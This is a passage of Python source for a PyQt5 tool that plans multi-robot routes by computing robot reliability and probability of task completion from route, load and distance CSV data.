self.threshold_type = True
self.threshold_value = 0.5
self.route_count = 0
# ------------------------------------------------------------------------------------------------
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(950, 700)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth())
MainWindow.setSizePolicy(sizePolicy)
MainWindow.setMinimumSize(QtCore.QSize(950, 700))
MainWindow.setMaximumSize(QtCore.QSize(950, 700))
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.groupBox_selection_analysis = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox_selection_analysis.setGeometry(QtCore.QRect(20, 20, 570, 330))
font = QtGui.QFont()
font.setPointSize(15)
self.groupBox_selection_analysis.setFont(font)
self.groupBox_selection_analysis.setObjectName("groupBox_selection_analysis")
self.comboBox_select_threshold_type = QtWidgets.QComboBox(self.groupBox_selection_analysis)
self.comboBox_select_threshold_type.setGeometry(QtCore.QRect(275, 150, 150, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.comboBox_select_threshold_type.setFont(font)
self.comboBox_select_threshold_type.setObjectName("comboBox_select_threshold_type")
self.label_5 = QtWidgets.QLabel(self.groupBox_selection_analysis)
self.label_5.setGeometry(QtCore.QRect(0, 150, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_5.setFont(font)
self.label_5.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_5.setObjectName("label_5")
self.doubleSpinBox_threshold_value = QtWidgets.QDoubleSpinBox(self.groupBox_selection_analysis)
self.doubleSpinBox_threshold_value.setGeometry(QtCore.QRect(275, 200, 100, 35))
self.doubleSpinBox_threshold_value.setDecimals(5)
self.doubleSpinBox_threshold_value.setMaximum(1.0)
self.doubleSpinBox_threshold_value.setSingleStep(0.05)
self.doubleSpinBox_threshold_value.setProperty("value", 0.5)
self.doubleSpinBox_threshold_value.setObjectName("doubleSpinBox_threshold_value")
self.label_8 = QtWidgets.QLabel(self.groupBox_selection_analysis)
self.label_8.setGeometry(QtCore.QRect(0, 200, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_8.setFont(font)
self.label_8.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_8.setObjectName("label_8")
self.label_9 = QtWidgets.QLabel(self.groupBox_selection_analysis)
self.label_9.setGeometry(QtCore.QRect(0, 250, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_9.setFont(font)
self.label_9.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_9.setObjectName("label_9")
self.spinBox_route_count = QtWidgets.QSpinBox(self.groupBox_selection_analysis)
self.spinBox_route_count.setGeometry(QtCore.QRect(275, 250, 100, 35))
self.spinBox_route_count.setMaximum(100000)
self.spinBox_route_count.setObjectName("spinBox_route_count")
self.label_10 = QtWidgets.QLabel(self.groupBox_selection_analysis)
self.label_10.setGeometry(QtCore.QRect(120, 290, 271, 41))
font = QtGui.QFont()
font.setPointSize(8)
self.label_10.setFont(font)
self.label_10.setTextFormat(QtCore.Qt.AutoText)
self.label_10.setScaledContents(False)
self.label_10.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_10.setWordWrap(True)
self.label_10.setObjectName("label_10")
self.label_3 = QtWidgets.QLabel(self.groupBox_selection_analysis)
self.label_3.setGeometry(QtCore.QRect(0, 100, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_3.setFont(font)
self.label_3.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_3.setObjectName("label_3")
self.comboBox_load_data = QtWidgets.QComboBox(self.groupBox_selection_analysis)
self.comboBox_load_data.setGeometry(QtCore.QRect(275, 100, 150, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.comboBox_load_data.setFont(font)
self.comboBox_load_data.setObjectName("comboBox_load_data")
self.spinBox_robot_route_count = QtWidgets.QSpinBox(self.groupBox_selection_analysis)
self.spinBox_robot_route_count.setGeometry(QtCore.QRect(275, 50, 100, 35))
self.spinBox_robot_route_count.setMinimum(1)
self.spinBox_robot_route_count.setMaximum(1000)
self.spinBox_robot_route_count.setObjectName("spinBox_robot_route_count")
self.pushButton_set_robot_count = QtWidgets.QPushButton(self.groupBox_selection_analysis)
self.pushButton_set_robot_count.setGeometry(QtCore.QRect(460, 40, 100, 50))
font = QtGui.QFont()
font.setPointSize(15)
self.pushButton_set_robot_count.setFont(font)
self.pushButton_set_robot_count.setObjectName("pushButton_set_robot_count")
self.label_11 = QtWidgets.QLabel(self.groupBox_selection_analysis)
self.label_11.setGeometry(QtCore.QRect(0, 50, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_11.setFont(font)
self.label_11.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_11.setObjectName("label_11")
self.plainTextEdit_result_view = QtWidgets.QPlainTextEdit(self.centralwidget)
self.plainTextEdit_result_view.setGeometry(QtCore.QRect(620, 35, 300, 500))
self.plainTextEdit_result_view.setReadOnly(True)
self.plainTextEdit_result_view.setPlainText("")
self.plainTextEdit_result_view.setObjectName("plainTextEdit_result_view")
self.pushButton_start_analysis = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_start_analysis.setGeometry(QtCore.QRect(690, 550, 150, 75))
font = QtGui.QFont()
font.setPointSize(15)
self.pushButton_start_analysis.setFont(font)
self.pushButton_start_analysis.setObjectName("pushButton_start_analysis")
self.groupBox_robot_configuration = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox_robot_configuration.setEnabled(False)
self.groupBox_robot_configuration.setGeometry(QtCore.QRect(20, 400, 570, 271))
font = QtGui.QFont()
font.setPointSize(15)
self.groupBox_robot_configuration.setFont(font)
self.groupBox_robot_configuration.setObjectName("groupBox_robot_configuration")
self.label_12 = QtWidgets.QLabel(self.groupBox_robot_configuration)
self.label_12.setGeometry(QtCore.QRect(0, 30, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_12.setFont(font)
self.label_12.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_12.setObjectName("label_12")
self.comboBox_select_robot = QtWidgets.QComboBox(self.groupBox_robot_configuration)
self.comboBox_select_robot.setGeometry(QtCore.QRect(275, 30, 150, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.comboBox_select_robot.setFont(font)
self.comboBox_select_robot.setObjectName("comboBox_select_robot")
self.label_7 = QtWidgets.QLabel(self.groupBox_robot_configuration)
self.label_7.setGeometry(QtCore.QRect(400, 230, 71, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_7.setFont(font)
self.label_7.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.label_7.setObjectName("label_7")
self.label_6 = QtWidgets.QLabel(self.groupBox_robot_configuration)
self.label_6.setGeometry(QtCore.QRect(400, 180, 71, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_6.setFont(font)
self.label_6.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.label_6.setObjectName("label_6")
self.doubleSpinBox_nominal_capacity_value = QtWidgets.QDoubleSpinBox(self.groupBox_robot_configuration)
self.doubleSpinBox_nominal_capacity_value.setGeometry(QtCore.QRect(275, 230, 100, 35))
self.doubleSpinBox_nominal_capacity_value.setDecimals(1)
self.doubleSpinBox_nominal_capacity_value.setMaximum(100000.0)
self.doubleSpinBox_nominal_capacity_value.setSingleStep(0.5)
self.doubleSpinBox_nominal_capacity_value.setObjectName("doubleSpinBox_nominal_capacity_value")
self.doubleSpinBox_robot_speed_value = QtWidgets.QDoubleSpinBox(self.groupBox_robot_configuration)
self.doubleSpinBox_robot_speed_value.setGeometry(QtCore.QRect(275, 180, 100, 35))
self.doubleSpinBox_robot_speed_value.setDecimals(3)
self.doubleSpinBox_robot_speed_value.setMaximum(100.0)
self.doubleSpinBox_robot_speed_value.setObjectName("doubleSpinBox_robot_speed_value")
self.label_4 = QtWidgets.QLabel(self.groupBox_robot_configuration)
self.label_4.setGeometry(QtCore.QRect(0, 230, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_4.setFont(font)
self.label_4.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_4.setObjectName("label_4")
self.lineEdit_hazard_rate_value = QtWidgets.QLineEdit(self.groupBox_robot_configuration)
self.lineEdit_hazard_rate_value.setGeometry(QtCore.QRect(275, 80, 200, 35))
self.lineEdit_hazard_rate_value.setObjectName("lineEdit_hazard_rate_value")
self.label = QtWidgets.QLabel(self.groupBox_robot_configuration)
self.label.setGeometry(QtCore.QRect(0, 80, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label.setFont(font)
self.label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label.setObjectName("label")
self.label_2 = QtWidgets.QLabel(self.groupBox_robot_configuration)
self.label_2.setGeometry(QtCore.QRect(0, 180, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_2.setFont(font)
self.label_2.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_2.setObjectName("label_2")
self.lineEdit_start_reliability_value = QtWidgets.QLineEdit(self.groupBox_robot_configuration)
self.lineEdit_start_reliability_value.setGeometry(QtCore.QRect(275, 130, 200, 35))
self.lineEdit_start_reliability_value.setObjectName("lineEdit_start_reliability_value")
self.label_13 = QtWidgets.QLabel(self.groupBox_robot_configuration)
self.label_13.setGeometry(QtCore.QRect(0, 130, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_13.setFont(font)
self.label_13.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_13.setObjectName("label_13")
MainWindow.setCentralWidget(self.centralwidget)
# ---------------------------------------------------------------------------------------------------------------
self.potc_gui_main_func()
# ---------------------------------------------------------------------------------------------------------------
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "Prognostic Aware Multi Robot Route Planning"))
self.groupBox_selection_analysis.setTitle(_translate("MainWindow", "Analysis Options"))
self.label_5.setText(_translate("MainWindow", "Select Threshold Type"))
self.label_8.setText(_translate("MainWindow", "Threshold Value"))
self.label_9.setText(_translate("MainWindow", "Route Count"))
self.label_10.setText(_translate("MainWindow", "Note: It refers to the number of routes to be analyzed. If the value is 0, it refers to the maximum value."))
self.label_3.setText(_translate("MainWindow", "Use Load Data"))
self.pushButton_set_robot_count.setText(_translate("MainWindow", "Set Count"))
self.label_11.setText(_translate("MainWindow", "Set Robot Count"))
self.pushButton_start_analysis.setText(_translate("MainWindow", "Start Analysis"))
self.groupBox_robot_configuration.setTitle(_translate("MainWindow", "Robot Configuration"))
self.label_12.setText(_translate("MainWindow", "Select Robot"))
self.label_7.setText(_translate("MainWindow", "kg"))
self.label_6.setText(_translate("MainWindow", "km / h"))
self.label_4.setText(_translate("MainWindow", "Nominal Capacity Value"))
self.label.setText(_translate("MainWindow", "Hazard Rate Value"))
self.label_2.setText(_translate("MainWindow", "Robot Speed Value"))
self.label_13.setText(_translate("MainWindow", "Start Reliability Value"))
# ------------------------------------------------------------------------------------------------
def potc_gui_main_func(self):
self.gui_default_parameters_func()
self.potc_gui_events_func()
def gui_default_parameters_func(self):
load_data_list = list(["True", "False"])
self.comboBox_load_data.addItems(load_data_list)
filter_list = list(["POTC Value", "Reliability Value"])
self.comboBox_select_threshold_type.addItems(filter_list)
self.doubleSpinBox_threshold_value.setValue(0.5)
self.spinBox_route_count.setValue(0)
self.comboBox_select_robot.addItem("None")
self.pushButton_start_analysis.setEnabled(False)
def potc_gui_events_func(self):
self.pushButton_set_robot_count.clicked.connect(self.click_set_robot_count_button_func)
self.pushButton_start_analysis.clicked.connect(self.click_start_analysis_button_func)
self.lineEdit_hazard_rate_value.textChanged.connect(self.event_lineEdit_hazard_rate_value_func)
self.doubleSpinBox_robot_speed_value.valueChanged.connect(self.event_doubleSpinBox_robot_speed_value_func)
self.comboBox_load_data.currentIndexChanged.connect(self.event_comboBox_load_data_func)
self.doubleSpinBox_nominal_capacity_value.valueChanged.connect(self.event_doubleSpinBox_nominal_capacity_value_func)
self.comboBox_select_threshold_type.currentIndexChanged.connect(self.event_comboBox_select_threshold_type_func)
self.doubleSpinBox_threshold_value.valueChanged.connect(self.event_doubleSpinBox_threshold_value_func)
self.spinBox_route_count.valueChanged.connect(self.event_spinBox_route_count_func)
self.comboBox_select_robot.currentIndexChanged.connect(self.event_comboBox_select_robot_func)
self.lineEdit_start_reliability_value.textChanged.connect(self.event_lineEdit_start_reliability_value_func)
def click_set_robot_count_button_func(self):
self.robot_count = self.spinBox_robot_route_count.value()
if self.robot_count > 6:
self.robot_count = 6
self.initial_configuration_dicts_func(self.robot_count)
print(self.initial_configuration_dict)
robot_list = list()
for item in range(len(list(self.initial_configuration_dict.keys()))):
robot_list.append(str("Robot " + str(item + 1)))
self.comboBox_select_robot.addItems(robot_list)
self.main_read_func(self.robot_count)
self.label_11.setEnabled(False)
self.spinBox_robot_route_count.setEnabled(False)
self.pushButton_set_robot_count.setEnabled(False)
self.groupBox_robot_configuration.setEnabled(True)
self.pushButton_start_analysis.setEnabled(True)
def click_start_analysis_button_func(self):
try:
potc_class = CalculatePOTC(self.robot_count, self.robot_main_dict, self.initial_configuration_dict, self.distance_list, self.load_control, self.threshold_type, self.threshold_value, self.route_count)
#potc_class.calculate_main_potc_func()
#calculate_thread = threading.Thread(target=potc_class.calculate_main_potc_func)
#calculate_thread.start()
#calculate_thread.join()
now = datetime.now()
dt_string = now.strftime("%Y_%m_%d_-_%H_%M_%S")
if self.load_control:
file_name = str("potc_analysis_loaded_" + str(dt_string))
else:
file_name = str("potc_analysis_unloaded_" + str(dt_string))
self.csv_write(potc_class.write_data_list, file_name)
print("\n\n\nDosya Yazma islemi Basari ile gerceklesti")
set_value = potc_class.selected_route_count_list
self.set_plain_text_edit_result_view_func(set_value)
except Exception as err:
print("\n\nError: click_start_analysis_button_func")
print(err)
def event_lineEdit_hazard_rate_value_func(self):
try:
selected_cb_robot = str(self.comboBox_select_robot.currentText())
selected_robot = selected_cb_robot.split("Robot ")[-1]
if selected_cb_robot != "None" and selected_cb_robot != "":
get_value = self.lineEdit_hazard_rate_value.text()
if get_value != "":
self.initial_configuration_dict[str("robot_" + str(selected_robot))]["Hazard Rate"] = float(get_value)
except Exception as err:
print("\n\nError: event_lineEdit_hazard_rate_value_func")
print(err)
def event_doubleSpinBox_robot_speed_value_func(self):
try:
selected_cb_robot = str(self.comboBox_select_robot.currentText())
selected_robot = selected_cb_robot.split("Robot ")[-1]
if selected_cb_robot != "None" and selected_cb_robot != "":
get_value = self.doubleSpinBox_robot_speed_value.value()
self.initial_configuration_dict[str("robot_" + str(selected_robot))]["Speed"] = float(get_value)
except Exception as err:
print("\n\nError: event_doubleSpinBox_robot_speed_value_func")
print(err)
def event_comboBox_load_data_func(self):
try:
get_value = str(self.comboBox_load_data.currentText())
if get_value == "True":
self.load_control = True
else:
self.load_control = False
except Exception as err:
print("\n\nError: comboBox_load_data")
print(err)
def event_doubleSpinBox_nominal_capacity_value_func(self):
try:
selected_cb_robot = str(self.comboBox_select_robot.currentText())
selected_robot = selected_cb_robot.split("Robot ")[-1]
if selected_cb_robot != "None" and selected_cb_robot != "":
get_value = self.doubleSpinBox_nominal_capacity_value.value()
self.initial_configuration_dict[str("robot_" + str(selected_robot))]["Nominal Capacity"] = float(get_value)
except Exception as err:
print("\n\nError: event_doubleSpinBox_nominal_capacity_value_func")
print(err)
def event_comboBox_select_threshold_type_func(self):
try:
get_value = str(self.comboBox_select_threshold_type.currentText())
if get_value == "POTC Value":
self.threshold_type = True
elif get_value == "Reliability Value":
self.threshold_type = False
except Exception as err:
print("\n\nError: event_comboBox_select_threshold_type_func")
print(err)
def event_doubleSpinBox_threshold_value_func(self):
try:
get_value = self.doubleSpinBox_threshold_value.value()
self.threshold_value = float(get_value)
except Exception as err:
print("\n\nError: event_doubleSpinBox_threshold_value_func")
print(err)
def event_spinBox_route_count_func(self):
try:
get_value = self.spinBox_route_count.value()
self.route_count = int(get_value)
except Exception as err:
print("\n\nError: event_spinBox_route_count_func")
print(err)
def event_comboBox_select_robot_func(self):
try:
selected_cb_robot = str(self.comboBox_select_robot.currentText())
if selected_cb_robot != "None" and selected_cb_robot != "":
selected_robot = selected_cb_robot.split("Robot ")[-1]
self.set_enable_robot_configuration_group_func(True)
self.lineEdit_hazard_rate_value.setText(str(self.initial_configuration_dict[str("robot_" + str(selected_robot))]["Hazard Rate"]))
self.lineEdit_start_reliability_value.setText(str(self.initial_configuration_dict[str("robot_" + str(selected_robot))]["Reliability"]))
self.doubleSpinBox_robot_speed_value.setValue(float(self.initial_configuration_dict[str("robot_" + str(selected_robot))]["Speed"]))
self.doubleSpinBox_nominal_capacity_value.setValue(float(self.initial_configuration_dict[str("robot_" + str(selected_robot))]["Nominal Capacity"]))
else:
self.lineEdit_hazard_rate_value.setText("")
self.lineEdit_start_reliability_value.setText("")
self.doubleSpinBox_robot_speed_value.setValue(0.0)
self.doubleSpinBox_nominal_capacity_value.setValue(0.0)
self.set_enable_robot_configuration_group_func(False)
except Exception as err:
print("\n\nError: event_comboBox_select_robot_func")
print(err)
def event_lineEdit_start_reliability_value_func(self):
try:
selected_cb_robot = str(self.comboBox_select_robot.currentText())
selected_robot = selected_cb_robot.split("Robot ")[-1]
if selected_cb_robot != "None" and selected_cb_robot != "":
get_value = self.lineEdit_start_reliability_value.text()
if get_value != "":
self.initial_configuration_dict[str("robot_" + str(selected_robot))]["Reliability"] = float(get_value)
except Exception as err:
print("\n\nError: event_lineEdit_start_reliability_value_func")
print(err)
def set_plain_text_edit_result_view_func(self, set_value):
self.plainTextEdit_result_view.clear()
write_value = ""
for item in set_value:
temp = str(item[0]) + "\t-> " + str(item[1])
write_value = write_value + "\n" + temp
self.plainTextEdit_result_view.setPlainText(write_value)
# ------------------------------------------------------------------------------------------------
@classmethod
def get_current_workspace(cls):
"""
Get Current Workspace Function
"""
file_full_path = os.path.dirname(os.path.realpath(__file__))
directory_name = sys.argv[0].split('/')[-2]
workspace_name = file_full_path.split(str(directory_name))[0]
return workspace_name
def read_distance_file_func(self):
df = pd.read_csv(str(self.current_workspace) + 'potc_analysis/params/' + str(self.distance_filename) + '.csv', sep=',', header=None)
self.distance_list = df.values
def read_route_loads_func(self, robot_no):
with open(str(self.current_workspace) + 'potc_analysis/params/' + str(self.route_load_filename) + '.csv', 'r') as csvfile:
read_data = csv.reader(csvfile, delimiter=',')
next(read_data)
robot_load_dict = dict()
for row in read_data:
robot_load_list = list()
for row_count in range(self.robot_column_no_dict["Yuk"]["Count"]):
robot_load_list.append(float(row[int(self.robot_column_no_dict["Yuk"][str(robot_no)] + row_count)]))
robot_load_dict[str(row[0])] = robot_load_list
self.robot_main_dict["Yuk"][str("robot_" + str(robot_no))] = robot_load_dict
def read_route_func(self, robot_no):
with open(str(self.current_workspace) + 'potc_analysis/params/' + str(self.route_set_filename) + '.csv', 'r') as csvfile:
read_data = csv.reader(csvfile, delimiter=',')
next(read_data)
robot_route_dict = dict()
for row in read_data:
robot_route_list = list()
for row_count in range(int(row[int(self.robot_column_no_dict["Mesafe"][str(robot_no)] - 1)])):
robot_route_list.append(float(row[int(self.robot_column_no_dict["Mesafe"][str(robot_no)] + row_count)]))
robot_route_dict[str(row[0])] = robot_route_list
self.robot_main_dict["Mesafe"][str("robot_" + str(robot_no))] = robot_route_dict
def read_speed_func(self, robot_no):
with open(str(self.current_workspace) + 'potc_analysis/params/' + str(self.route_set_filename) + '.csv', 'r') as csvfile:
read_data = csv.reader(csvfile, delimiter=',')
next(read_data)
robot_speed_dict = dict()
for row in read_data:
robot_speed_list = list()
for row_count in range(int(row[int(self.robot_column_no_dict["Mesafe"][str(robot_no)] - 1)]) - 1):
robot_speed_list.append(float(row[int(self.robot_column_no_dict["Hiz"][str(robot_no)] + row_count)]))
robot_speed_dict[str(row[0])] = robot_speed_list
self.robot_main_dict["Hiz"][str("robot_" + str(robot_no))] = robot_speed_dict
def main_read_func(self, robot_count):
self.read_distance_file_func()
for cnt in range(robot_count):
self.read_route_loads_func((cnt + 1))
self.read_route_func((cnt + 1))
def csv_write(self, write_data_list, file_name):
with open(str(self.current_workspace) + 'potc_analysis/params/write_data/'+ str(file_name) + '.csv','w+') as csvFile:
writer = csv.writer(csvFile)
writer.writerows(write_data_list)
csvFile.close()
# -------------------------------------------------------------------
def initial_configuration_dicts_func(self, robot_count):
value = 0.05
for item in range(robot_count):
#self.initial_configuration_dict[str("robot_" + str(item + 1))] = {"Hazard Rate": float(5.07e-04), "Reliability": float(1), "Nominal Capacity": float(200), "Speed": float(4.32)}
self.initial_configuration_dict[str("robot_" + str(item + 1))] = {"Hazard Rate": float(5.07e-04), "Reliability": float(1 - (item * value)), "Nominal Capacity": float(200), "Speed": float(4.32)}
def set_enable_robot_configuration_group_func(self, status):
self.lineEdit_hazard_rate_value.setEnabled(status)
self.lineEdit_start_reliability_value.setEnabled(status)
self.doubleSpinBox_robot_speed_value.setEnabled(status)
self.doubleSpinBox_nominal_capacity_value.setEnabled(status)
self.label.setEnabled(status)
self.label_13.setEnabled(status)
self.label_2.setEnabled(status)
self.label_4.setEnabled(status)
self.label_6.setEnabled(status)
self.label_7.setEnabled(status)
# -------------------------------------------------------------------
class CalculatePOTC:
    """
    Computes the probability of task completion (POTC) and system
    reliability for multi-robot routes (speeds in km/h, distances in km).
    """
def __init__(self, robot_count, robot_main_dict, initial_configuration_dict, distance_list, load_control, threshold_type, threshold_value, route_count):
self.robot_count = robot_count
self.initial_configuration_dict = initial_configuration_dict
self.robot_main_dict = robot_main_dict
self.distance_list = distance_list
self.load_control = load_control
self.threshold_type = threshold_type
self.threshold_value = threshold_value
if route_count == 0:
self.robot_main_dict_count = len(list(self.robot_main_dict["Mesafe"][str("robot_" + str(self.robot_count))].keys()))
self.route_count = self.robot_main_dict_count
else:
self.route_count = route_count
self.write_data_list = list()
self.selected_route_count_list = list()
self.system_main_dict = dict()
self.system_main_dict["0"] = {"POTC": 1, "Reliability": 1, "Secili Rota": 0, "Robot Reliability": list(), "Robot Time": list(), "Robot Distance": list()}
self.initial_system_main_dict_func()
@classmethod
def failure_rate_calculation_using_operating_load_func(cls, failure_rate, p_value, p_0):
"""
λ = λ0 * ((P + P0) / P0) ^ 3
"""
result = float(failure_rate * pow(((float(p_value) + float(p_0)) / float(p_0)), 3))
return result
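    # Worked example (sketch): with the default hazard rate λ0 = 5.07e-04,
    # an operating load P = 100 kg and nominal capacity P0 = 200 kg:
    #   λ = 5.07e-04 * ((100 + 200) / 200) ** 3 = 5.07e-04 * 3.375 ≈ 1.71e-03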
@classmethod
def probability_of_task_completion_formula(cls, reliability, distance):
potc_result = float(pow(float(reliability), float(distance)))
return potc_result
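    # Worked example: a reliability of 0.999 maintained over a 5 km segment
    # gives POTC = 0.999 ** 5 ≈ 0.9950.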
@classmethod
def calculate_time_func(cls, distance, speed):
time = float(distance / speed)
return time
@classmethod
def reliability_exponential_func(cls, reliability_time, failure_rate):
"""
Reliability Model = Exponential Distribution
R = e ^ -(λt)
"""
return float(math.exp(float(-1) * float(reliability_time) * float(failure_rate)))
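    # Worked example: with λ = 5.07e-04 1/h and t = 2 h,
    #   R = exp(-5.07e-04 * 2) = exp(-1.014e-03) ≈ 0.99899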
@classmethod
def time_convert_function(cls, time_value):
seconds = float(time_value)*60*60
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
result = "%02d:%02d:%02d"%(hours,minutes,seconds)
return result
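    # Example: time_convert_function(1.5) -> "01:30:00" (1.5 h = 5400 s).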
def initial_system_main_dict_func(self):
robot_reliability_list = list()
robot_time_list = list()
robot_distance_list = list()
for item in range(self.robot_count):
robot_reliability_list.append(self.initial_configuration_dict[str("robot_" + str(item + 1))]["Reliability"])
robot_time_list.append(float(0.0))
robot_distance_list.append(float(0.0))
self.system_main_dict["0"]["Robot Reliability"] = robot_reliability_list
self.system_main_dict["0"]["Robot Time"] = robot_time_list
self.system_main_dict["0"]["Robot Distance"] = robot_distance_list
def set_write_data_list_func(self):
key_count = len(list(self.system_main_dict.keys()))
# Headers
temp_list = list()
temp_list.append("Count")
temp_list.append(str(""))
temp_list.append("Secili Rota")
temp_list.append(str(""))
temp_list.append("POTC")
temp_list.append(str(""))
temp_list.append("Reliability")
temp_list.append(str(""))
temp_list.append("Robot Reliability ->")
for cnt in range(self.robot_count):
temp_list.append(str("Robot " + str(cnt + 1)))
temp_list.append(str(""))
temp_list.append("Robot Zaman ->")
for cnt in range(self.robot_count):
temp_list.append(str("Robot " + str(cnt + 1)))
temp_list.append(str(""))
temp_list.append("Robot Mesafe ->")
for cnt in range(self.robot_count):
temp_list.append(str("Robot " + str(cnt + 1)))
temp_list.append(str(""))
temp_list.append("Ortalama Zaman")
temp_list.append(str(""))
temp_list.append("Ortalama Mesafe")
temp_list.append(str(""))
temp_list.append("Rota Secilme Miktari ->")
temp_list.append("Rota Numarasi")
temp_list.append("Secilme Miktari")
self.write_data_list.append(temp_list)
filter_list = list()
for item in range(key_count):
temp_list = list()
time_list = list()
distance_list = list()
temp_list.append(str(item))
temp_list.append(str(""))
temp_list.append(self.system_main_dict[str(item)]["Secili Rota"])
filter_list.append(self.system_main_dict[str(item)]["Secili Rota"])
temp_list.append(str(""))
temp_list.append(self.system_main_dict[str(item)]["POTC"])
temp_list.append(str(""))
temp_list.append(self.system_main_dict[str(item)]["Reliability"])
temp_list.append(str(""))
temp_list.append(str(""))
for cnt in range(self.robot_count):
temp_list.append(self.system_main_dict[str(item)]["Robot Reliability"][cnt])
temp_list.append(str(""))
temp_list.append(str(""))
for cnt in range(self.robot_count):
temp_list.append(self.system_main_dict[str(item)]["Robot Time"][cnt])
temp_list.append(str(""))
for cnt in range(self.robot_count):
time_list.append(self.system_main_dict[str(item)]["Robot Time"][cnt])
temp_list.append(str(""))
for cnt in range(self.robot_count):
temp_list.append(self.system_main_dict[str(item)]["Robot Distance"][cnt])
temp_list.append(str(""))
for cnt in range(self.robot_count):
distance_list.append(self.system_main_dict[str(item)]["Robot Distance"][cnt])
time_average = self.average_list_func(time_list)
temp_list.append(self.time_convert_function(time_average))
temp_list.append(str(""))
distance_average = self.average_list_func(distance_list)
temp_list.append(distance_average)
self.write_data_list.append(temp_list)
uniq_filter_list = list(dict.fromkeys(filter_list))
for item in uniq_filter_list:
if item != 0:
temp = [item, filter_list.count(item)]
self.selected_route_count_list.append(temp)
for i in range(len(self.selected_route_count_list)):
self.write_data_list[(i+1)].append(str(""))
self.write_data_list[(i+1)].append(str(""))
self.write_data_list[(i+1)].append(self.selected_route_count_list[i][0])
self.write_data_list[(i+1)].append(self.selected_route_count_list[i][1])
def average_list_func(self, temp_list):
result = 0.0
for item in temp_list:
result += float(item)
list_count = len(temp_list)
average_result = float(result / list_count)
return average_result
def calculate_system_reliability_func(self, robot_reliability_list):
system_reliability = 1
for rlblty in robot_reliability_list:
system_reliability *= rlblty
return system_reliability
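    # Worked example: two robots with reliabilities [0.99, 0.98] give a
    # series-system reliability of 0.99 * 0.98 = 0.9702.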
def get_mesafe_and_zaman_list_func(self, temp_mesafe_list, robot_cnt):
list_count = len(temp_mesafe_list)
mesafe_list = list()
zaman_list = list()
for count in range(list_count - 1):
mesafe = float(self.distance_list[int(temp_mesafe_list[count])][int(temp_mesafe_list[count + 1])]) / 1000
robot_speed_value = float(self.initial_configuration_dict[str("robot_" + str(robot_cnt))]["Speed"])
zaman = self.calculate_time_func(mesafe, robot_speed_value)
mesafe_list.append(mesafe)
zaman_list.append(zaman)
return mesafe_list, zaman_list
def calculate_potc_and_reliability_func(self, process_count, mesafe_list, zaman_list, route_cnt, robot_cnt):
time_value = float(0)
distance_value = float(0)
reliability_value = self.system_main_dict[str(process_count - 1)]["Robot Reliability"][robot_cnt - 1]
potc_value = float(0)
for item_count in range(len(mesafe_list)):
selected_robot_hazard_rate = float(self.initial_configuration_dict[str("robot_" + str(robot_cnt))]["Hazard Rate"])
selected_robot_nominal_capacity = float(self.initial_configuration_dict[str("robot_" + str(robot_cnt))]["Nominal Capacity"])
if self.load_control:
p_value = self.robot_main_dict["Yuk"][str("robot_" + str(robot_cnt))][str(route_cnt)][item_count]
hazard_rate = self.failure_rate_calculation_using_operating_load_func(selected_robot_hazard_rate, p_value, selected_robot_nominal_capacity)
else:
hazard_rate = selected_robot_hazard_rate
time_value += zaman_list[item_count]
distance_value += mesafe_list[item_count]
new_reliability = self.reliability_exponential_func(zaman_list[item_count], hazard_rate)
reliability_value = reliability_value * new_reliability
potc_value = float(self.probability_of_task_completion_formula(reliability_value, mesafe_list[item_count]))
return potc_value, reliability_value, time_value, distance_value
def calculate_robot_potc_and_reliability_func(self, process_count, route_cnt):
robot_potc_value = float(1)
